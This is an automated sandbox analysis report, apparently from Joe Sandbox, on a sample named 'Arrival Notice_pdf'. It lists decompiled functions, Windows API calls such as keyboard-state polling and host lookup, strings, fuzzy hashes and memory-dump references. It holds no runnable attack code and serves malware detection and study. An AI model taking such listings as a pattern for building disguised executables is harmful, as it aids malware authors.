API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: a4ac56182e4811d396a53ff820a5bda906852354461e4fc833e85ad4e0403b93
Instruction ID: 11b94cf3144957243b1078ee6fbaafd352b9ad8bbd05e94a2a273ccc6d150fd4
Opcode Fuzzy Hash: a4ac56182e4811d396a53ff820a5bda906852354461e4fc833e85ad4e0403b93
Instruction Fuzzy Hash: 6FB1F975A10209AFDB14DFA4C888DAEBBB9FF48704B1484A9F905EB251DB70EE51CF50

Function 00282E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00282ED6
SetKeyboardState.USER32(?), ref: 00282F41
GetAsyncKeyState.USER32(000000A0), ref: 00282F61
GetKeyState.USER32(000000A0), ref: 00282F78
GetAsyncKeyState.USER32(000000A1), ref: 00282FA7
GetKeyState.USER32(000000A1), ref: 00282FB8
GetAsyncKeyState.USER32(00000011), ref: 00282FE4
GetKeyState.USER32(00000011), ref: 00282FF2
GetAsyncKeyState.USER32(00000012), ref: 0028301B
GetKeyState.USER32(00000012), ref: 00283029
GetAsyncKeyState.USER32(0000005B), ref: 00283052
GetKeyState.USER32(0000005B), ref: 00283060

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 59d792113140f86b7caecb31162a821f4acb7d48399afb04a5c4f0448e43d2e7
Instruction ID: 6577775a4e8990400144ba7557b7d36a9b2b9e74f44e4d356d7b25ee56cd847e
Opcode Fuzzy Hash: 59d792113140f86b7caecb31162a821f4acb7d48399afb04a5c4f0448e43d2e7
Instruction Fuzzy Hash: 0D511738A1678569FB35FFB088007EABFF45F11740F08459EC5C25A5C2DA54AB9CCB62

Function 0027ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0027ED1E
GetWindowRect.USER32(00000000,?), ref: 0027ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0027ED8E
GetDlgItem.USER32(?,00000002), ref: 0027ED99
GetWindowRect.USER32(00000000,?), ref: 0027EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0027EE01
GetDlgItem.USER32(?,000003E9), ref: 0027EE0F
GetWindowRect.USER32(00000000,?), ref: 0027EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0027EE63
GetDlgItem.USER32(?,000003EA), ref: 0027EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0027EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0027EE9B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 3578956911c5c64e493579b07a6e25609e926041bc5b62516aaf5be35f107f53
Instruction ID: 2f9f0f18116218648a9b70bc78d42152350bc2e1c72dd938ab8131070a5da450
Opcode Fuzzy Hash: 3578956911c5c64e493579b07a6e25609e926041bc5b62516aaf5be35f107f53
Instruction Fuzzy Hash: 28510EB1B10205AFDF18CF69DD89EAEBBBAEB88710F158569F519D7290D770AD00CB10

Function 0025B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0025B759,?,00000000,?,?,?,?,0025B72B,00000000,?), ref: 0025BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0025B72B), ref: 0025B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 0025B88D
DestroyAcceleratorTable.USER32(00000000), ref: 002BD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 002BD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 002BD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 002BD90A
DeleteObject.GDI32(00000000), ref: 002BD91C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 373bbc026227365c9a1482e0c8daa38236a662df3d41edaab8931dd3591342a2
Instruction ID: e296e7d819160a7fe8c33f2486d3338131aa67c8db6a4af1e1f6abb568d295de
Opcode Fuzzy Hash: 373bbc026227365c9a1482e0c8daa38236a662df3d41edaab8931dd3591342a2
Instruction Fuzzy Hash: D9619E31522A06DFDB279F18DC98BA5B7B9FF94313F14052EE84647960C771A8A8CF48

Function 0025B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0025B526: GetWindowLongW.USER32(?,000000EB), ref: 0025B537

GetSysColor.USER32(0000000F), ref: 0025B438

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f8f17f7c713c7c81b5bfd5f3182780c34f0c2455a91245fb5e2556893e105961
Instruction ID: f39c32661c533f9d3e1e733b033fcb789f6fafba29c176f4aa40fe0eb7a3610a
Opcode Fuzzy Hash: f8f17f7c713c7c81b5bfd5f3182780c34f0c2455a91245fb5e2556893e105961
Instruction Fuzzy Hash: 9241DF30010145AFDF326F28EC99FB93B66AB06732F588265FD698E1E2D7708C55CB25

Function 0028690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00286923
_wcscpy.LIBCMT ref: 00286934
__wsplitpath.LIBCMT ref: 00286958
__wsplitpath.LIBCMT ref: 00286979
_wcscpy.LIBCMT ref: 0028699B
_wcscpy.LIBCMT ref: 002869B9
_wcscpy.LIBCMT ref: 002869C7
_wcscat.LIBCMT ref: 002869D6
_wcscat.LIBCMT ref: 00286A2B
_wcscat.LIBCMT ref: 00286A61
_wcscat.LIBCMT ref: 00286A73

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 2bdc84c05f62c790662c2e53cb3b3d7485617ea55b8419f6a6b8efadb9dd8c07
Instruction ID: cc194b018d1ec87671dea6847505ed066cc4f774baa8158d8c7ce122238d6f46
Opcode Fuzzy Hash: 2bdc84c05f62c790662c2e53cb3b3d7485617ea55b8419f6a6b8efadb9dd8c07
Instruction Fuzzy Hash: BF410E7A85611CAECF65EB94CC85DDB73BCEB44300F0041E6B659A2091EA70ABF58F50

Function 0028D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(002DDC00,002DDC00,002DDC00), ref: 0028D7CE
GetDriveTypeW.KERNEL32(?,002F3A70,00000061), ref: 0028D898
_wcscpy.LIBCMT ref: 0028D8C2

Strings

ramdisk, xrefs: 0028D842
cdrom, xrefs: 0028D7EA
network, xrefs: 0028D82C
removable, xrefs: 0028D800
all, xrefs: 0028D7D4
unknown, xrefs: 0028D859
fixed, xrefs: 0028D816

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 23c7b167cce9932b98b70168e660329625e0dea880e92a80bc3776621efe39bd
Instruction ID: 8336e2c2c408356f97cc98fe4dfcff6351fef4e5e6e99d322392c562c9c5e6b4
Opcode Fuzzy Hash: 23c7b167cce9932b98b70168e660329625e0dea880e92a80bc3776621efe39bd
Instruction Fuzzy Hash: 1F51A0351252059FC704FF14D881A6AB7A5EF84714F20882EF99A572E2DB71DE2DCF42

Function 0024936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002493AB
__itow.LIBCMT ref: 002493DF

Part of subcall function 00261557: _xtow@16.LIBCMT ref: 00261578

Strings

False, xrefs: 002B4C93
0x%p, xrefs: 002B4CAD
%.15g, xrefs: 002493A5
True, xrefs: 002B4C8C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: b1e2f753e2efd4d15964a415affb206c9faccaca0af6f8111631d3a0c99a53fb
Instruction ID: ea115b4ee988274c4626d62277670dba472c134fe8368ac037297f0268031372
Opcode Fuzzy Hash: b1e2f753e2efd4d15964a415affb206c9faccaca0af6f8111631d3a0c99a53fb
Instruction Fuzzy Hash: 6241EB315312059BDB28EF74D981EBAB7E4EF45340F2444ABE549D7182EA71D9B1CF10

Function 002AA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002AA259
CreateCompatibleDC.GDI32(00000000), ref: 002AA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002AA273
SelectObject.GDI32(00000000,00000000), ref: 002AA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 002AA286
DeleteDC.GDI32(00000000), ref: 002AA28F
GetWindowLongW.USER32(?,000000EC), ref: 002AA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002AA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002AA2B9

Strings

static, xrefs: 002AA1F1

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 9ad6bc6262c7ab13816f65b4aadc7db2d80b25d22b1d22ec30be920c658e04c3
Instruction ID: b1f8c10ccb05ca7a878603fece5555952696f1cbf56450858e164039abad740d
Opcode Fuzzy Hash: 9ad6bc6262c7ab13816f65b4aadc7db2d80b25d22b1d22ec30be920c658e04c3
Instruction Fuzzy Hash: 8B317031111115BFDF215FA4EC49FEA3B6DFF0A360F110228FA19A61A0CB76D821DBA5

Function 00286F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00286F1D
gethostname.WSOCK32(?,00000100), ref: 00286F37
gethostbyname.WSOCK32(?), ref: 00286F44
_wcscpy.LIBCMT ref: 00286F6C
inet_ntoa.WSOCK32(?), ref: 00286F8A
_strcat.LIBCMT ref: 00286F98
_wcscpy.LIBCMT ref: 00286FAF
WSACleanup.WSOCK32 ref: 00286FBD
_wcscpy.LIBCMT ref: 00286FCB

Strings

0.0.0.0, xrefs: 00286F66

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 581ac727b52fb24e6f965a46b750a70fa5d9a9e7f9af81d480c514f9a96604c3
Instruction ID: 0e26337870127e7583e4da06bb5ca0f606a673733769a405627f263505b6a5fc
Opcode Fuzzy Hash: 581ac727b52fb24e6f965a46b750a70fa5d9a9e7f9af81d480c514f9a96604c3
Instruction Fuzzy Hash: 3B110676924115AFDB25BB70AC4EEDAB7ACEF54710F000176F606A60C1EF70DEA58B50

Function 0026500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00265047

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__gmtime64_s.LIBCMT ref: 002650E0
__gmtime64_s.LIBCMT ref: 00265116
__gmtime64_s.LIBCMT ref: 00265133
__allrem.LIBCMT ref: 00265189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002651A5
__allrem.LIBCMT ref: 002651BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002651DA
__allrem.LIBCMT ref: 002651F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0026520F
__invoke_watson.LIBCMT ref: 00265280

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 593e1946a1dfb17941da57940c6e79ce3d586aca4345ad7daf0bc0b3c92fb9af
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 9F71EB72A20F27ABE7149F78CC51B5A73A8AF05764F14822AF914D7681E770DDA08BD0

Function 00284DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00284DF8
GetMenuItemInfoW.USER32(00301708,000000FF,00000000,00000030), ref: 00284E59
SetMenuItemInfoW.USER32(00301708,00000004,00000000,00000030), ref: 00284E8F
Sleep.KERNEL32(000001F4), ref: 00284EA1
GetMenuItemCount.USER32(?), ref: 00284EE5
GetMenuItemID.USER32(?,00000000), ref: 00284F01
GetMenuItemID.USER32(?,-00000001), ref: 00284F2B
GetMenuItemID.USER32(?,?), ref: 00284F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00284FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00284FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00284FEB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 1e93dd8a97c0953832e555008e63e395981c8231fe637c706822995b3c7191cd
Instruction ID: 1faec0974b07459a5a015576a6ce0b686b5541f98757e3bf4d747b4a88a758a0
Opcode Fuzzy Hash: 1e93dd8a97c0953832e555008e63e395981c8231fe637c706822995b3c7191cd
Instruction Fuzzy Hash: BF61C2B892125AAFDB21FF64DC88EAE7BB8FB15348F14015DF541A3691D770AD24CB20

Function 002A9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002A9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002A9C9B
GetWindowLongW.USER32(?,000000F0), ref: 002A9CBF
_memset.LIBCMT ref: 002A9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002A9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002A9D5A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 3dc1bc830ccf8b7b2c5f7e3e97c4bbe4b449d0251348a532e934a7b05cf497a3
Instruction ID: 5a3439d0f861791b1bcf1cf52f5d83eaef446c551b42fef134a856708f44c23a
Opcode Fuzzy Hash: 3dc1bc830ccf8b7b2c5f7e3e97c4bbe4b449d0251348a532e934a7b05cf497a3
Instruction Fuzzy Hash: 73617A75910208AFDB11DFA8CC81EEEB7B8EF0A714F14419AFA05E7291DB70AD91DB50

Function 002794E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002794FE
SafeArrayAllocData.OLEAUT32(?), ref: 00279549
VariantInit.OLEAUT32(?), ref: 0027955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0027957B
VariantCopy.OLEAUT32(?,?), ref: 002795BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 002795D2
VariantClear.OLEAUT32(?), ref: 002795E7
SafeArrayDestroyData.OLEAUT32(?), ref: 002795F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002795FD
VariantClear.OLEAUT32(?), ref: 0027960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0027961A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 57920bc3d23ad3ad3377f1a4fec43c5cbde2c5c91f38bf4054b27d1575053d9a
Instruction ID: 6b8a4e8bac58a628221f9f01c8f6e5c271509280d77f8bd4016269bfd7f790e4
Opcode Fuzzy Hash: 57920bc3d23ad3ad3377f1a4fec43c5cbde2c5c91f38bf4054b27d1575053d9a
Instruction Fuzzy Hash: 79412C35910219AFCB15EFA4DC88DDEBB79FF08355F008065E906A3251DB70EA95CFA0

Function 0029BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0029BB5C
VariantInit.OLEAUT32(?), ref: 0029BC2D
VariantInit.OLEAUT32(?), ref: 0029BD2E
VariantClear.OLEAUT32(?), ref: 0029BD38
VariantClear.OLEAUT32(?), ref: 0029BD99

Strings

Null Object assignment in FOR..IN loop, xrefs: 0029BBBD, 0029BCEB, 0029BDA7
h?/, xrefs: 0029BB2D
|?/, xrefs: 0029BB34
Incorrect Object type in FOR..IN loop, xrefs: 0029BD11

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?/$|?/
API String ID: 2862541840-2835492252
Opcode ID: e2c5637f8faa1b603a4970ba0b7dba9aca5838066edc5a69e83d42413bf9e436
Instruction ID: fc4a52914d02019f649633e1eb68e5f32fc7984333ab7385104f7cc1507aba7f
Opcode Fuzzy Hash: e2c5637f8faa1b603a4970ba0b7dba9aca5838066edc5a69e83d42413bf9e436
Instruction Fuzzy Hash: 6291B371A20219AFDF25DF94DD44FAEB7B8EF45710F10815AF505AB280D7709954CFA0

Function 0029ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CoInitialize.OLE32 ref: 0029ADF6
CoUninitialize.OLE32 ref: 0029AE01
CoCreateInstance.OLE32(?,00000000,00000017,002CD8FC,?), ref: 0029AE61
IIDFromString.OLE32(?,?), ref: 0029AED4
VariantInit.OLEAUT32(?), ref: 0029AF6E
VariantClear.OLEAUT32(?), ref: 0029AFCF

Strings

Failed to create object, xrefs: 0029AE6C, 0029AF22
Invalid parameter, xrefs: 0029AEED
NULL Pointer assignment, xrefs: 0029AEA6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

